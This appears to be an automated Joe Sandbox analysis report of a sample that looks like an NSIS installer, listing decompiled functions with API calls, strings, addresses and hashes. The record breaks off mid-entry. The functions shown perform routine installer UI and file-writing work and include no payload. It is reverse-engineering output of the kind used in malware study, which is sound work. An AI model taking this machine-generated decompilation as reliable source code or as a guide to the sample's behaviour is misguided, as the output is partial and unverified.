                                                          • Instruction ID: e010a8171ff36a63e9221139458dc5df23460d7ee6f57f6168b5e09891e1807c
                                                          • Opcode Fuzzy Hash: 40c1fda0fc222d3deaf0be0606799ffba2a33d40f74f168943dcfaeb9bc9158e
                                                          • Instruction Fuzzy Hash: 9141D2B4408305EFF324DF24C880A6AB7F8FB843D4B11892DF94687199DB34BA94CB65
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00404B7A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E00404B7A(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageW(_t28, 0x113e, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}














                                                          0x00404b88
                                                          0x00404b95
                                                          0x00404b9b
                                                          0x00404bd9
                                                          0x00404bd9
                                                          0x00404be8
                                                          0x00404bef
                                                          0x00000000
                                                          0x00404bf1
                                                          0x00404b9d
                                                          0x00404bac
                                                          0x00404bb4
                                                          0x00404bb7
                                                          0x00404bc9
                                                          0x00404bcf
                                                          0x00404bd6
                                                          0x00000000
                                                          0x00404bd6
                                                          0x00000000

                                                          APIs
                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404B95
                                                          • GetMessagePos.USER32 ref: 00404B9D
                                                          • ScreenToClient.USER32 ref: 00404BB7
                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404BC9
                                                          • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404BEF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.644793479.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.644775997.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644817233.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_fcab.jbxd
                                                          Similarity
                                                          • API ID: Message$Send$ClientScreen
                                                          • String ID: f
                                                          • API String ID: 41195575-1993550816
                                                          • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                          • Instruction ID: 6d27a89fd112f7dd13df74400405474d9978eabb633620400ae5318118f47dfb
                                                          • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                          • Instruction Fuzzy Hash: CD015E71900218BADB00DB94DD85FFFBBBCAF95711F10412BBA51B61D0D7B4A9018BA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00401DB3 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 73%
                                                          			E00401DB3(intOrPtr __edx) {
				void* __esi;
				int _t9;
				signed char _t15;
				struct HFONT__* _t18;
				intOrPtr _t30;
				struct HDC__* _t31;
				void* _t33;
				void* _t35;

				_t30 = __edx;
				_t31 = GetDC( *(_t35 - 8));
				_t9 = E00402C15(2);
				 *((intOrPtr*)(_t35 - 0x4c)) = _t30;
				0x40cdb0->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t31, 0x5a), 0x48));
				ReleaseDC( *(_t35 - 8), _t31);
				 *0x40cdc0 = E00402C15(3);
				_t15 =  *((intOrPtr*)(_t35 - 0x18));
				 *((intOrPtr*)(_t35 - 0x4c)) = _t30;
				 *0x40cdc7 = 1;
				 *0x40cdc4 = _t15 & 0x00000001;
				 *0x40cdc5 = _t15 & 0x00000002;
				 *0x40cdc6 = _t15 & 0x00000004;
				E0040626E(_t9, _t31, _t33, "Calibri",  *((intOrPtr*)(_t35 - 0x24)));
				_t18 = CreateFontIndirectW(0x40cdb0);
				_push(_t18);
				_push(_t33);
				E00406193();
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}











                                                          0x00401db3
                                                          0x00401dbe
                                                          0x00401dc0
                                                          0x00401dcd
                                                          0x00401de4
                                                          0x00401de9
                                                          0x00401df6
                                                          0x00401dfb
                                                          0x00401dff
                                                          0x00401e0a
                                                          0x00401e11
                                                          0x00401e23
                                                          0x00401e29
                                                          0x00401e2e
                                                          0x00401e38
                                                          0x0040258c
                                                          0x0040156d
                                                          0x00402a65
                                                          0x00402ac2
                                                          0x00402ace

                                                          APIs
                                                          • GetDC.USER32(?), ref: 00401DB6
                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD0
                                                          • MulDiv.KERNEL32(00000000,00000000), ref: 00401DD8
                                                          • ReleaseDC.USER32 ref: 00401DE9
                                                          • CreateFontIndirectW.GDI32(0040CDB0), ref: 00401E38
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.644793479.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.644775997.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644817233.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_fcab.jbxd
                                                          Similarity
                                                          • API ID: CapsCreateDeviceFontIndirectRelease
                                                          • String ID: Calibri
                                                          • API String ID: 3808545654-1409258342
                                                          • Opcode ID: 32b3ac885727d1e190cdd40c39b4cdf091ab3af3085104150676e708dd364a64
                                                          • Instruction ID: beb1058faab58ab776b37266111e77616320e0f2a6455f46a6b6c1c153f06785
                                                          • Opcode Fuzzy Hash: 32b3ac885727d1e190cdd40c39b4cdf091ab3af3085104150676e708dd364a64
                                                          • Instruction Fuzzy Hash: B6015272558241EFE7006BB0AF8AA9A7FB4AB55301F10497EF241B61E2CA7800458B2D
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00402DD7 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E00402DD7(struct HWND__* _a4, intOrPtr _a8) {
				short _v132;
				int _t11;
				int _t20;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t20 =  *0x40ce98; // 0x54265
					_t11 =  *0x418ea4; // 0x54269
					if(_t20 >= _t11) {
						_t20 = _t11;
					}
					wsprintfW( &_v132, L"verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
					SetWindowTextW(_a4,  &_v132);
					SetDlgItemTextW(_a4, 0x406,  &_v132);
				}
				return 0;
			}






                                                          0x00402de7
                                                          0x00402df5
                                                          0x00402dfb
                                                          0x00402dfb
                                                          0x00402e09
                                                          0x00402e0b
                                                          0x00402e11
                                                          0x00402e18
                                                          0x00402e1a
                                                          0x00402e1a
                                                          0x00402e30
                                                          0x00402e40
                                                          0x00402e52
                                                          0x00402e52
                                                          0x00402e5a

                                                          APIs
                                                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402DF5
                                                          • MulDiv.KERNEL32(00054265,00000064,00054269), ref: 00402E20
                                                          • wsprintfW.USER32 ref: 00402E30
                                                          • SetWindowTextW.USER32(?,?), ref: 00402E40
                                                          • SetDlgItemTextW.USER32 ref: 00402E52
                                                          Strings
                                                          • verifying installer: %d%%, xrefs: 00402E2A
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.644793479.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.644775997.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644817233.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_fcab.jbxd
                                                          Similarity
                                                          • API ID: Text$ItemTimerWindowwsprintf
                                                          • String ID: verifying installer: %d%%
                                                          • API String ID: 1451636040-82062127
                                                          • Opcode ID: e049c72b028903268a13e0303fe007745629d422319b61ed44a985218b4f833f
                                                          • Instruction ID: 725db9d4d41e60ee2dd5d311e5346f84fbed97106a71cca60d70b9a4d06edbb5
                                                          • Opcode Fuzzy Hash: e049c72b028903268a13e0303fe007745629d422319b61ed44a985218b4f833f
                                                          • Instruction Fuzzy Hash: 73014471640208ABDF209F60DD49FAA3B69EB00708F008039FA05F91D0DBB989558B99
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004028A7 Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 37%
                                                          			E004028A7(void* __ebx) {
				void* _t26;
				long _t31;
				void* _t45;
				void* _t49;
				void* _t51;
				void* _t54;
				void* _t55;
				void* _t56;

				_t45 = __ebx;
				 *((intOrPtr*)(_t56 - 0x30)) = 0xfffffd66;
				_t50 = E00402C37(0xfffffff0);
				 *(_t56 - 0x38) = _t23;
				if(E00405B94(_t50) == 0) {
					E00402C37(0xffffffed);
				}
				E00405D19(_t50);
				_t26 = E00405D3E(_t50, 0x40000000, 2);
				 *(_t56 + 8) = _t26;
				if(_t26 != 0xffffffff) {
					_t31 =  *0x42a218;
					 *(_t56 - 0x3c) = _t31;
					_t49 = GlobalAlloc(0x40, _t31);
					if(_t49 != _t45) {
						E004032F5(_t45);
						E004032DF(_t49,  *(_t56 - 0x3c));
						_t54 = GlobalAlloc(0x40,  *(_t56 - 0x20));
						 *(_t56 - 0x4c) = _t54;
						if(_t54 != _t45) {
							_push( *(_t56 - 0x20));
							_push(_t54);
							_push(_t45);
							_push( *((intOrPtr*)(_t56 - 0x24)));
							E004030FA();
							while( *_t54 != _t45) {
								_t47 =  *_t54;
								_t55 = _t54 + 8;
								 *(_t56 - 0x34) =  *_t54;
								E00405CF9( *((intOrPtr*)(_t54 + 4)) + _t49, _t55, _t47);
								_t54 = _t55 +  *(_t56 - 0x34);
							}
							GlobalFree( *(_t56 - 0x4c));
						}
						E00405DF0( *(_t56 + 8), _t49,  *(_t56 - 0x3c));
						GlobalFree(_t49);
						_push(_t45);
						_push(_t45);
						_push( *(_t56 + 8));
						_push(0xffffffff);
						 *((intOrPtr*)(_t56 - 0x30)) = E004030FA();
					}
					CloseHandle( *(_t56 + 8));
				}
				_t51 = 0xfffffff3;
				if( *((intOrPtr*)(_t56 - 0x30)) < _t45) {
					_t51 = 0xffffffef;
					DeleteFileW( *(_t56 - 0x38));
					 *((intOrPtr*)(_t56 - 4)) = 1;
				}
				_push(_t51);
				E00401423();
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t56 - 4));
				return 0;
			}











                                                          0x004028a7
                                                          0x004028a9
                                                          0x004028b5
                                                          0x004028b8
                                                          0x004028c2
                                                          0x004028c6
                                                          0x004028c6
                                                          0x004028cc
                                                          0x004028d9
                                                          0x004028e1
                                                          0x004028e4
                                                          0x004028ea
                                                          0x004028f8
                                                          0x004028fd
                                                          0x00402901
                                                          0x00402904
                                                          0x0040290d
                                                          0x00402919
                                                          0x0040291d
                                                          0x00402920
                                                          0x00402922
                                                          0x00402925
                                                          0x00402926
                                                          0x00402927
                                                          0x0040292a
                                                          0x00402949
                                                          0x00402931
                                                          0x00402936
                                                          0x0040293e
                                                          0x00402941
                                                          0x00402946
                                                          0x00402946
                                                          0x00402950
                                                          0x00402950
                                                          0x0040295d
                                                          0x00402963
                                                          0x00402969
                                                          0x0040296a
                                                          0x0040296b
                                                          0x0040296e
                                                          0x00402975
                                                          0x00402975
                                                          0x0040297b
                                                          0x0040297b
                                                          0x00402986
                                                          0x00402987
                                                          0x0040298b
                                                          0x0040298f
                                                          0x00402995
                                                          0x00402995
                                                          0x0040299c
                                                          0x00402245
                                                          0x00402ac2
                                                          0x00402ace

                                                          APIs
                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 004028FB
                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 00402917
                                                          • GlobalFree.KERNEL32 ref: 00402950
                                                          • GlobalFree.KERNEL32 ref: 00402963
                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 0040297B
                                                          • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 0040298F
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.644793479.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.644775997.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644817233.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_fcab.jbxd
                                                          Similarity
                                                          • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                          • String ID:
                                                          • API String ID: 2667972263-0
                                                          • Opcode ID: 794126d87b7ab7f3e2e070d8386bcb8afdde5fae5b7e809f26f6fd9fec4836ff
                                                          • Instruction ID: c6e800f027f1e1b1e461e4fc783814b3910171fe2b09394c7840a14eb176b3fb
                                                          • Opcode Fuzzy Hash: 794126d87b7ab7f3e2e070d8386bcb8afdde5fae5b7e809f26f6fd9fec4836ff
                                                          • Instruction Fuzzy Hash: 9821BFB1D00124BBDF206FA5DE49D9E7E79EF08364F10423AF954762E1CB794C419B98
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00404A6C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 77%
                                                          			E00404A6C(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v68;
				char _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t23;
				signed int _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t44;
				signed int _t46;
				signed int _t50;
				signed int _t52;
				signed int _t53;
				signed int _t55;

				_t23 = _a16;
				_t53 = _a12;
				_t44 = 0xffffffdc;
				if(_t23 == 0) {
					_push(0x14);
					_pop(0);
					_t24 = _t53;
					if(_t53 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t44 = 0xffffffdd;
					}
					if(_t53 < 0x400) {
						_t44 = 0xffffffde;
					}
					if(_t53 < 0xffff3333) {
						_t52 = 0x14;
						asm("cdq");
						_t24 = 1 / _t52 + _t53;
					}
					_t25 = _t24 & 0x00ffffff;
					_t55 = _t24 >> 0;
					_t46 = 0xa;
					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
				} else {
					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
					_t50 = 0;
				}
				_t31 = E0040626E(_t44, _t50, _t55,  &_v68, 0xffffffdf);
				_t33 = E0040626E(_t44, _t50, _t55,  &_v132, _t44);
				_t34 = E0040626E(_t44, _t50, 0x4236e8, 0x4236e8, _a8);
				wsprintfW(_t34 + lstrlenW(0x4236e8) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
				return SetDlgItemTextW( *0x4291d8, _a4, 0x4236e8);
			}



















                                                          0x00404a75
                                                          0x00404a7a
                                                          0x00404a82
                                                          0x00404a83
                                                          0x00404a90
                                                          0x00404a98
                                                          0x00404a99
                                                          0x00404a9b
                                                          0x00404a9d
                                                          0x00404a9f
                                                          0x00404aa2
                                                          0x00404aa2
                                                          0x00404aa9
                                                          0x00404aaf
                                                          0x00404aaf
                                                          0x00404ab6
                                                          0x00404abd
                                                          0x00404ac0
                                                          0x00404ac3
                                                          0x00404ac3
                                                          0x00404ac7
                                                          0x00404ad7
                                                          0x00404ad9
                                                          0x00404adc
                                                          0x00404a85
                                                          0x00404a85
                                                          0x00404a8c
                                                          0x00404a8c
                                                          0x00404ae4
                                                          0x00404aef
                                                          0x00404b05
                                                          0x00404b16
                                                          0x00404b32

                                                          APIs
                                                          • lstrlenW.KERNEL32(004236E8,004236E8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B0D
                                                          • wsprintfW.USER32 ref: 00404B16
                                                          • SetDlgItemTextW.USER32 ref: 00404B29
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.644793479.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.644775997.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644817233.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_fcab.jbxd
                                                          Similarity
                                                          • API ID: ItemTextlstrlenwsprintf
                                                          • String ID: %u.%u%s%s$6B
                                                          • API String ID: 3540041739-3884863406
                                                          • Opcode ID: 95c3251a73d665659f4e5ef41dc4b3ed63ce9024b19b633afc4b02d7477ffd45
                                                          • Instruction ID: 5e68f5a3766037a7274f1f000e531c578f4d2f2b22a3e42eca2e55653584bdbe
                                                          • Opcode Fuzzy Hash: 95c3251a73d665659f4e5ef41dc4b3ed63ce9024b19b633afc4b02d7477ffd45
                                                          • Instruction Fuzzy Hash: F111D8736481283BDB00656D9C45E9F329CDB81374F150237FE66F61D1D9788C2186EC
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00402592 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 69stringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 88%
                                                          			E00402592(int __ebx, void* __edx, intOrPtr* __esi) {
				signed int _t14;
				int _t17;
				int _t24;
				signed int _t29;
				intOrPtr* _t32;
				void* _t34;
				void* _t35;
				void* _t38;
				signed int _t40;

				_t32 = __esi;
				_t24 = __ebx;
				_t14 =  *(_t35 - 0x20);
				_t38 = __edx - 0x38;
				 *(_t35 - 0x4c) = _t14;
				_t27 = 0 | _t38 == 0x00000000;
				_t29 = _t38 == 0;
				if(_t14 == __ebx) {
					if(__edx != 0x38) {
						_t17 = lstrlenW(E00402C37(0x11)) + _t16;
					} else {
						E00402C37(0x21);
						WideCharToMultiByte(__ebx, __ebx, "C:\Users\hardz\AppData\Local\Temp\nsjD2A6.tmp", 0xffffffff, "C:\Users\hardz\AppData\Local\Temp\nsjD2A6.tmp\System.dll", 0x400, __ebx, __ebx);
						_t17 = lstrlenA("C:\Users\hardz\AppData\Local\Temp\nsjD2A6.tmp\System.dll");
					}
				} else {
					E00402C15(1);
					 *0x40ada8 = __ax;
					 *((intOrPtr*)(__ebp - 0x3c)) = __edx;
				}
				 *(_t35 + 8) = _t17;
				if( *_t32 == _t24) {
					L13:
					 *((intOrPtr*)(_t35 - 4)) = 1;
				} else {
					_t34 = E004061AC(_t27, _t32);
					if((_t29 |  *(_t35 - 0x4c)) != 0 ||  *((intOrPtr*)(_t35 - 0x1c)) == _t24 || E00405E1F(_t34, _t34) >= 0) {
						_t14 = E00405DF0(_t34, "C:\Users\hardz\AppData\Local\Temp\nsjD2A6.tmp\System.dll",  *(_t35 + 8));
						_t40 = _t14;
						if(_t40 == 0) {
							goto L13;
						}
					} else {
						goto L13;
					}
				}
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}












                                                          0x00402592
                                                          0x00402592
                                                          0x00402592
                                                          0x00402597
                                                          0x0040259a
                                                          0x0040259d
                                                          0x004025a2
                                                          0x004025a4
                                                          0x004025c4
                                                          0x00402602
                                                          0x004025c6
                                                          0x004025c8
                                                          0x004025e2
                                                          0x004025ed
                                                          0x004025ed
                                                          0x004025a6
                                                          0x004025a8
                                                          0x004025ad
                                                          0x004025bb
                                                          0x004025be
                                                          0x00402607
                                                          0x0040260a
                                                          0x00402885
                                                          0x00402885
                                                          0x00402610
                                                          0x00402619
                                                          0x0040261b
                                                          0x0040263a
                                                          0x004015b4
                                                          0x004015b6
                                                          0x00000000
                                                          0x004015bc
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0040261b
                                                          0x00402ac2
                                                          0x00402ace

                                                          APIs
                                                          • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsjD2A6.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsjD2A6.tmp\System.dll,00000400,?,?,00000021), ref: 004025E2
                                                          • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsjD2A6.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nsjD2A6.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsjD2A6.tmp\System.dll,00000400,?,?,00000021), ref: 004025ED
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.644793479.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.644775997.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644817233.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_fcab.jbxd
                                                          Similarity
                                                          • API ID: ByteCharMultiWidelstrlen
                                                          • String ID: C:\Users\user\AppData\Local\Temp\nsjD2A6.tmp$C:\Users\user\AppData\Local\Temp\nsjD2A6.tmp\System.dll
                                                          • API String ID: 3109718747-3006799975
                                                          • Opcode ID: 4caddf9fd98015af0c89a896aabe676fd06aff106387eddf506ca1aab1ee46e7
